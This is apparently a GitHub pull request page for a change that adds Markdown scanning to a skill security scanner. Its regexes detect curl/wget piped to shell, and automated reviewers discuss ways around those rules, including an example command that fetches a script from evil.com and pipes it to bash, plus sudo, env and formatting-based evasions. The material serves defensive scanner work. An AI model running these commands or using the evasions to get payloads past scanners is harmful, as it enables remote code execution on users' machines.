security: scan markdown skill definitions for injection threats#43469
security: scan markdown skill definitions for injection threats#43469Alex-Alaniz wants to merge 5 commits into
Conversation
Greptile SummaryThis PR extends the skill scanner to detect injection and obfuscation threats in markdown ( Changes:
Issues found:
Confidence Score: 3/5
Last reviewed commit: 15bb77c |
| const SCANNABLE_EXTENSIONS = new Set([ | ||
| ".js", | ||
| ".ts", | ||
| ".mjs", | ||
| ".cjs", | ||
| ".mts", | ||
| ".cts", | ||
| ".jsx", | ||
| ".tsx", | ||
| ...Array.from(CODE_EXTENSIONS), | ||
| ...Array.from(MARKDOWN_EXTENSIONS), | ||
| ]); |
There was a problem hiding this comment.
Unnecessary Array.from() wrapping when spreading sets
Set is directly iterable and can be spread without Array.from(). The Array.from() calls add unnecessary allocations and reduce readability.
| const SCANNABLE_EXTENSIONS = new Set([ | |
| ".js", | |
| ".ts", | |
| ".mjs", | |
| ".cjs", | |
| ".mts", | |
| ".cts", | |
| ".jsx", | |
| ".tsx", | |
| ...Array.from(CODE_EXTENSIONS), | |
| ...Array.from(MARKDOWN_EXTENSIONS), | |
| ]); | |
| const SCANNABLE_EXTENSIONS = new Set([...CODE_EXTENSIONS, ...MARKDOWN_EXTENSIONS]); |
Prompt To Fix With AI
This is a comment left during a code review.
Path: src/security/skill-scanner.ts
Line: 43-46
Comment:
**Unnecessary `Array.from()` wrapping when spreading sets**
`Set` is directly iterable and can be spread without `Array.from()`. The `Array.from()` calls add unnecessary allocations and reduce readability.
```suggestion
const SCANNABLE_EXTENSIONS = new Set([...CODE_EXTENSIONS, ...MARKDOWN_EXTENSIONS]);
```
How can I resolve this? If you propose a fix, please make it concise.Note: If this suggestion doesn't match your team's coding style, reply to this and let me know. I'll remember it for next time!
| ruleId: "markdown-download-exec", | ||
| severity: "critical", | ||
| message: "Download-and-execute pattern detected in markdown content", | ||
| pattern: /(?:curl|wget)\s+[^\n|]*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/, |
There was a problem hiding this comment.
markdown-download-exec bypassed by pipe in curl/wget arguments
The pattern [^\n|]* stops matching at the first | character in a line. An attacker can evade this rule by embedding a pipe character in any curl argument, such as a header value or POST body:
curl -H "X-Header: value1|value2" https://evil.com/payload.sh | bash
When the engine tries to match:
(?:curl|wget)matchescurl\s+matches the space[^\n|]*matches up to the first|in the header value — stops there\|matches that embedded|\s*(?:sh|bash|...)tries to matchvalue2"...— fails
Backtracking cannot recover because [^\n|]* can never advance past the embedded pipe, so the real | bash at the end is never reached. The rule produces no finding.
A more robust alternative is to use a non-greedy dot-all match so that embedded pipes are allowed and only the final | <shell> needs to satisfy the suffix requirement:
/(?:curl|wget)\s+.*?\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/s
Or explicitly allow quoted segments to avoid false positives:
/(?:curl|wget)\s+(?:"[^"]*"|'[^']*'|[^\n|])*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/
Prompt To Fix With AI
This is a comment left during a code review.
Path: src/security/skill-scanner.ts
Line: 242
Comment:
**`markdown-download-exec` bypassed by pipe in curl/wget arguments**
The pattern `[^\n|]*` stops matching at the **first** `|` character in a line. An attacker can evade this rule by embedding a pipe character in any curl argument, such as a header value or POST body:
```
curl -H "X-Header: value1|value2" https://evil.com/payload.sh | bash
```
When the engine tries to match:
1. `(?:curl|wget)` matches `curl`
2. `\s+` matches the space
3. `[^\n|]*` matches up to the first `|` in the header value — stops there
4. `\|` matches that embedded `|`
5. `\s*(?:sh|bash|...)` tries to match `value2"...` — **fails**
Backtracking cannot recover because `[^\n|]*` can never advance past the embedded pipe, so the real `| bash` at the end is never reached. The rule produces no finding.
A more robust alternative is to use a non-greedy dot-all match so that embedded pipes are allowed and only the final `| <shell>` needs to satisfy the suffix requirement:
```
/(?:curl|wget)\s+.*?\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/s
```
Or explicitly allow quoted segments to avoid false positives:
```
/(?:curl|wget)\s+(?:"[^"]*"|'[^']*'|[^\n|])*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/
```
How can I resolve this? If you propose a fix, please make it concise.There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 15bb77c087
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| ruleId: "markdown-download-exec", | ||
| severity: "critical", | ||
| message: "Download-and-execute pattern detected in markdown content", | ||
| pattern: /(?:curl|wget)\s+[^\n|]*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/, |
There was a problem hiding this comment.
Match sudo-wrapped download-and-exec pipelines
The new markdown-download-exec rule only matches when sh|bash|... appears immediately after the pipe, so common variants like curl ... | sudo bash (or wget ... | sudo sh) are not flagged at all. Because plugin/skill install warnings and security audit --deep treat this rule as a critical signal, this creates an easy evasion path for exactly the markdown payload class this commit is meant to catch.
Useful? React with 👍 / 👎.
15bb77c to
b0c8822
Compare
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: b0c8822364
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| severity: "critical", | ||
| message: "Download-and-execute pattern detected in markdown content", | ||
| pattern: | ||
| /\b(?:curl|wget)\b(?:[^\n"'|\\]|\\.|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')*\|\s*(?:sh|bash|zsh|node|python|perl|ruby)\b/, |
There was a problem hiding this comment.
Match wrapped interpreters in download-exec markdown rule
The markdown-download-exec pattern is still too narrow after the pipe and only matches a bare command token, so equivalent execution forms like curl ... | /bin/bash, curl ... | python3, or line-wrapped continuations (curl ... \\ then | bash) do not trigger the critical finding even though they execute downloaded payloads. This creates a practical evasion path for security audit --deep on malicious markdown instructions. Fresh evidence: evaluating the exact regex at this line against these variants returns no match.
Useful? React with 👍 / 👎.
|
This pull request has been automatically marked as stale due to inactivity. |
|
Codex review: found issues before merge. Reviewed June 13, 2026, 5:05 PM ET / 21:05 UTC. Summary PR surface: Source +359, Tests +206, Docs +1. Total +566 across 3 files. Reproducibility: yes. Source inspection shows current main excludes Review metrics: 2 noteworthy metrics.
Merge readiness Overall follows the weaker of proof and patch quality, so missing proof can cap an otherwise strong patch. Rank-up moves:
Risk before merge
Maintainer options:
Next step before merge
Security Review findings
Review detailsBest possible solution: Port the Markdown rules and tests to Do we have a high-confidence way to reproduce the issue? Yes. Source inspection shows current main excludes Is this the best way to solve the issue? No as submitted. The hardening direction is useful, but the patch must be ported to the current scanner module and reviewed for audit false-positive/security-boundary impact before it is the best fix. Full review comments:
Overall correctness: patch is incorrect AGENTS.md: found and applied where relevant. Codex review notes: model internal, reasoning high; reviewed against d912909230e6. Label changesLabel justifications:
Evidence reviewedPR surface: Source +359, Tests +206, Docs +1. Total +566 across 3 files. View PR surface stats
Security concerns:
What I checked:
Likely related people:
What the crustacean ranks mean
Shiny media proof means a screenshot, video, or linked artifact directly shows the changed behavior. Runtime, network, CSP, and security claims still need visible diagnostics. How this review workflow works
|
b0c8822 to
6a1b9f1
Compare
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 6a1b9f1392
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
|
|
||
| const MARKDOWN_EXTENSIONS = new Set([".md"]); | ||
|
|
||
| const SCANNABLE_EXTENSIONS = new Set([...CODE_EXTENSIONS, ...MARKDOWN_EXTENSIONS]); |
There was a problem hiding this comment.
Prioritize code files before markdown in scan file budget
Adding .md to SCANNABLE_EXTENSIONS means markdown files now consume the same maxFiles quota (DEFAULT_MAX_SCAN_FILES = 500) used by walkDirWithLimit, so a package can evade JS/TS detection by including many benign markdown files first. In that case the traversal stops before reaching malicious code files, and critical rules like dangerous-exec never run even though the payload is present; this is a practical bypass for install-time security blocking.
Useful? React with 👍 / 👎.
6a1b9f1 to
892f8cf
Compare
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 892f8cf577
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| severity: "critical", | ||
| message: "Download-and-execute pattern detected in markdown content", | ||
| pattern: | ||
| /(?:curl|wget)\b[\s\S]*?\|\s*(?:(?:sudo|doas|env|\/usr\/bin\/env)\s+)*(?:\/(?:usr\/)?bin\/)?(?:sh|bash|zsh|fish|node(?:js)?|python(?:\d+(?:\.\d+)?)?|perl|ruby)(?:\d+(?:\.\d+)?)?\b/i, |
There was a problem hiding this comment.
Restrict markdown download-exec regex to command scope
The markdown-download-exec rule currently uses (?:curl|wget)\b[\s\S]*?\|..., which allows matching across arbitrary markdown text until any later pipe before bash/sh/python/...; this causes benign docs to be flagged as critical (for example, mentioning curl in prose and later having a markdown table row like | bash | ...). Because critical findings are used to gate security decisions, this introduces high-impact false positives and can block legitimate plugin installs/audits even when no download-and-exec command is present.
Useful? React with 👍 / 👎.
892f8cf to
4872dc9
Compare
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 4872dc95a6
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| severity: "critical", | ||
| message: "Download-and-execute pattern detected in markdown content", | ||
| pattern: | ||
| /\b(?:curl|wget)\b(?:[^\n"'|\\]|\\[^\n]|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|\\\r?\n[ \t]*)*\|\s*(?:(?:sudo|doas|env|\/usr\/bin\/env)\s+)*(?:\/(?:usr\/)?bin\/)?(?:sh|bash|zsh|fish|node(?:js)?|python(?:\d+(?:\.\d+)?)?|perl|ruby)(?:\d+(?:\.\d+)?)?\b/i, |
There was a problem hiding this comment.
Match sudo/env variants in markdown download-exec rule
The markdown-download-exec regex still misses common wrapped execution forms after the pipe, so payloads like curl ... | sudo -E bash or curl ... | env FOO=1 bash produce no critical finding and can bypass install/audit blocking. Fresh evidence: evaluating the exact pattern at this line against both command forms returns false, even though they execute downloaded content the same way as already-covered | sudo bash.
Useful? React with 👍 / 👎.
| severity: "critical", | ||
| message: "Download-and-execute pattern detected in markdown content", | ||
| pattern: | ||
| /\b(?:curl|wget)\b(?:[^\n"'|\\]|\\[^\n]|"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|\\\r?\n[ \t]*)*\|\s*(?:(?:sudo|doas|env|\/usr\/bin\/env)\s+)*(?:\/(?:usr\/)?bin\/)?(?:sh|bash|zsh|fish|node(?:js)?|python(?:\d+(?:\.\d+)?)?|perl|ruby)(?:\d+(?:\.\d+)?)?\b/i, |
There was a problem hiding this comment.
Exclude markdown table cells from download-exec detection
The current markdown-download-exec pattern still treats markdown table text as a shell pipeline, so benign content like | curl | bash | is flagged as a critical threat and can block legitimate installs/security audits. Fresh evidence: testing the current regex against that table row returns a match, which means command-name documentation can be misclassified as executable download-and-run behavior.
Useful? React with 👍 / 👎.
4872dc9 to
f62d3f5
Compare
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: f62d3f5ad0
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| .replace(/^(?:[-*]\s+|\$\s*|>\s*)/, "") | ||
| .replace(/^(?:run|install|setup)\s*:\s*/i, "") |
There was a problem hiding this comment.
Match ordered-list command prefixes in markdown pipeline rule
markdown-download-exec can be bypassed when commands are written as numbered steps (for example, 1. curl ... | bash), because stripMarkdownCommandPrefix only removes -, *, $, blockquote, and run/install/setup: prefixes before isDownloadCommandSegment checks for a leading curl|wget. In skill docs this numbered format is common, so malicious download-and-exec instructions can avoid the critical finding and pass install/audit scanning.
Useful? React with 👍 / 👎.
f62d3f5 to
10d7e25
Compare
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 10d7e258bd
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| .replace(/^(?:[-*]\s+|\$\s*|>\s*)/, "") | ||
| .replace(/^(?:run|install|setup)\s*:\s*/i, "") | ||
| .trim(); |
There was a problem hiding this comment.
Strip inline-code backticks before pipeline detection
markdown-download-exec currently misses commands wrapped in Markdown inline code (for example, Run `curl -fsSL https://x | bash` ) because stripMarkdownCommandPrefix does not remove surrounding backticks, so isDownloadCommandSegment never sees a segment starting with curl|wget. This is a practical bypass in SKILL.md-style docs where command snippets are often inline, allowing downloaded payload execution instructions to evade the critical finding used by install/audit checks.
Useful? React with 👍 / 👎.
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 25bb4bfb96
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| }): { line: number; evidence: string } | null { | ||
| for (const logicalLine of logicalMarkdownLines(params.lines)) { | ||
| const trimmed = logicalLine.text.trim(); | ||
| if (!trimmed || trimmed.startsWith("|") || !/\b(?:curl|wget)\b/i.test(trimmed)) { |
There was a problem hiding this comment.
Skip pipe-less markdown table rows in download-exec matcher
The table guard only ignores lines that start with |, but Markdown tables are also valid in the common col1 | col2 form without a leading pipe. In that case a documentation row like curl | bash is parsed as a shell pipeline and reported as a critical markdown-download-exec finding, which can incorrectly block installs/audits for benign docs. Fresh evidence: the new condition checks trimmed.startsWith("|") and therefore does not exclude pipe-less table rows.
Useful? React with 👍 / 👎.
| function isDownloadCommandSegment(segment: string): boolean { | ||
| return /^(?:curl|wget)\b/i.test(stripMarkdownCommandPrefix(segment)); |
There was a problem hiding this comment.
Accept absolute-path downloaders in markdown pipeline detection
The download segment check requires the pipeline's first command token to begin exactly with curl or wget, so equivalent forms like /usr/bin/curl ... | bash or /bin/wget ... | sh are missed. Those commands still download and immediately execute payloads, so this creates a straightforward evasion path for the new critical markdown rule.
Useful? React with 👍 / 👎.
…finitions The skill scanner previously only analyzed JS/TS files for malicious patterns, leaving SKILL.md files completely unscanned. This extends coverage to markdown files with rules targeting embedded technical threats: - Hidden Unicode (zero-width, bidi overrides) used to conceal malicious content - Download-and-execute patterns (curl|wget piped to shell) - Large base64 payloads in code fences (obfuscated content) - Hex-encoded payloads in markdown body - Data URIs with executable MIME types Code rules and markdown rules are applied independently — code patterns (eval, child_process) do not false-positive on markdown documentation, and markdown rules do not fire on JS/TS files. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
|
ClawSweeper PR egg 🔥 Warming up: real-behavior proof passed; findings, security review, or rank-up moves are still in progress. Hatch commandComment Hatchability rules:
What is this egg doing here?
|
|
This pull request has been automatically marked as stale due to inactivity. |
Summary
The skill scanner (
src/security/skill-scanner.ts) previously only scanned JavaScript/TypeScript-style source files for threats. This PR extends it to also scan Markdown.mdfiles, includingSKILL.mddefinitions, for injection and obfuscation patterns.Markdown-specific rules added:
hidden-unicodedetects zero-width characters and text-direction overrides that can hide malicious content from visual review.markdown-data-uridetects data URIs with executable MIME types such astext/htmlandapplication/javascript.markdown-download-execdetectscurl/wgetdownload-and-execute pipelines, including common bypass forms likesudo bash,/bin/bash,python3, line continuations, and quoted pipe characters inside arguments.markdown-encoded-payloaddetects large base64 blocks inside Markdown.markdown-hex-payloaddetects hex-encoded payloads inside Markdown.Implementation notes:
MARKDOWN_EXTENSIONSandisMarkdown()..mdtoSCANNABLE_EXTENSIONS.https://...are not accidentally truncated by code-comment stripping.Why this matters: skill definitions can include rendered Markdown. Without scanning these files, hidden instructions, obfuscated payloads, or download-and-execute commands in skill Markdown can bypass the existing code scanner.
Supersedes #10705 (auto-closed by stale bot). Rebased cleanly onto current
main.Test plan
pnpm test src/security/skill-scanner.test.tspnpm exec oxfmt --check --threads=1 CHANGELOG.md src/security/skill-scanner.ts src/security/skill-scanner.test.tspnpm check:changedReal behavior proof
Behavior or issue addressed: Markdown skill definitions such as
SKILL.mdare now scanned for hidden Unicode, executable data URIs, download-and-execute pipelines, and encoded payloads that previously fell outside the JavaScript/TypeScript scanner surface.Real environment tested: Local OpenClaw checkout on macOS at
/Users/alexalaniz/Code/openclaw-43469, based on currentopenclaw/openclaw:main(24bd0b212f), with dependencies installed usingpnpm@10.33.2.Exact steps or command run after this patch: Ran the actual scanner through
node node_modules/tsx/dist/cli.mjsagainst Markdown sources containingcurl/wgetbypass forms, then ranpnpm test src/security/skill-scanner.test.ts,pnpm exec oxfmt --check --threads=1 CHANGELOG.md src/security/skill-scanner.ts src/security/skill-scanner.test.ts, andpnpm check:changed.Evidence after fix: Copied live terminal output from the local OpenClaw checkout:
Observed result after fix: The actual parser-based scanner caught 7 Markdown download-and-execute bypass samples in the smoke run (
sudo bash,sudo -E bash,env FOO=1 bash,/bin/bash,python3, a backslash-newline before| bash, and a quoted pipe inside a curl header) and did not flag benign curl prose or| curl | bash |Markdown table cells, while the targeted scanner test file and changed-file gate completed successfully.What was not tested: No known gaps.